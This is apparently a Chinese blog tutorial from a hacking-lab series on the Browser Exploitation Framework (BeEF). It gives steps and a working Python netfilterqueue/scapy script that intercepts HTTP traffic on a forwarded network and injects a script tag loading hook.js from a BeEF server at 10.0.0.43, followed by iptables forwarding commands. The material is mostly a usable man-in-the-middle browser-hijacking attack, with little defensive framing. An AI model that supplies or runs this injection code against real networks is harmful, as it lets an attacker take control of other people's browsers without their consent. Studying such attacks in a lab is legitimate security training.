• Browser Exploitation Framework.
  • Allows us to launch a number of attacks on a hooked target.
  • Targets are hooked once they load Javascript code.
  • Hook code can be placed in an HTML page and share it with a target.
  • Or host page online and send URL to target.

Install the BeEF framework from Github and start the service.

Login in the BeEF website with the changed username and password.

Login in the BeEF Control Panel successfully.

Change the Default index page of Kali Linux and save it.

Browse the Kali website from different computers, then the watch the Control Panel to find something interesting.

Update the injection code in the Python script.

#!/usr/bin/env python

import re

from netfilterqueue import NetfilterQueue

from scapy.layers.inet import TCP, IP

from scapy.packet import Raw

def set_load(packet, load):

    packet[Raw].load = load

    del packet[IP].len

    del packet[IP].chksum

    del packet[TCP].chksum

    return packet

def process_packet(packet):

    scapy_packet = IP(packet.get_payload())

    # scapy_packet.show()

    if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP):

        load = scapy_packet[Raw].load

        if scapy_packet[TCP].dport == 80:

            print("[+] Request")

            load = re.sub(b"Accept-Encoding:.*?\\r\\n", b"", load)

        elif scapy_packet[TCP].sport == 80:

            print("[+] Response")

            injection_code = b'<script src="http://10.0.0.43:3000/hook.js"></script>'

            load = load.replace(b"</body>", injection_code + b"</body>")

            content_length_search = re.search(b"(?:Content-Length:\s)(\d*)", load)

            if content_length_search and b"text/html" in load:

                print(content_length_search)

                content_length = content_length_search.group(1)

                new_content_length = int(content_length) + len(injection_code)

                load = load.replace(content_length, str(new_content_length).encode())

        if load != scapy_packet[Raw].load:

            print("Payload")

            new_packet = set_load(scapy_packet, load)

            packet.set_payload(str(new_packet).encode())

    packet.accept()

queue = NetfilterQueue()

queue.bind(0, process_packet)

try:

    queue.run()

except KeyboardInterrupt:

    print('')

Execute the following commands on Kali Linux.

iptables --flush

iptablse -I FORWARD -j NFQUEUE --queue-num

echo  > /proc/sys/net/ipv4/ip_forward

Login the BeEF Control Panel, and go to the Commands page.

最新文章

  1. 根据Excel的内容和word模板生成对应的word文档
  2. 简单设置,解决使用webpack前后端跨域发送cookie的问题
  3. Andorid-15k+的面试题。
  4. 《Linux shell编程中 diff与vimdif的使用》RHEL6
  5. 1、Python django 框架下的word Excel TXT Image 等文件的上传
  6. Delphi窗体最大化按钮不可用情况下的最大化
  7. android在ubuntu中编译为.apk资料
  8. 从零开始学C++之从C到C++(二):引用、内联函数inline、四种类型转换运算符
  9. 毕向东udp学习笔记3多线程聊天
  10. iOS通用链接(Universal Links)突然点击无效的解决方案
  11. 两个activity或者activity和fragment传值
  12. SDL 开发实战(四): SDL 事件处理
  13. 安装MySQL5.7.19 网上的文章参考 并做了部分修改
  14. matplotlib的安装和允许中文及几种字体
  15. Docker实现容器具有固定IP
  16. java Api 读取HDFS文件内容
  17. 【图解】Web前端实现类似Excel的电子表格
  18. 【SqlServer】Sqlserver中的DOS命令操作
  19. LeetCode 896 Monotonic Array 解题报告
  20. Linux下使用OTL操作mysql数据库

热门文章

  1. rust 学习之旅二,关键字和保留字
  2. VS2017未安装MFC解决方法
  3. c++ UDP套接字客服端代码示范
  4. powershell代码混淆绕过
  5. Jmeter接口测试,往MySQL数据库写数据时,中文显示???
  6. RabbitMQ:五、高阶
  7. Python3-apscheduler模块-定时调度
  8. IDEA 使用jebel热部署插件启动失败
  9. docker创建tomcat容器
  10. C# 模型赋值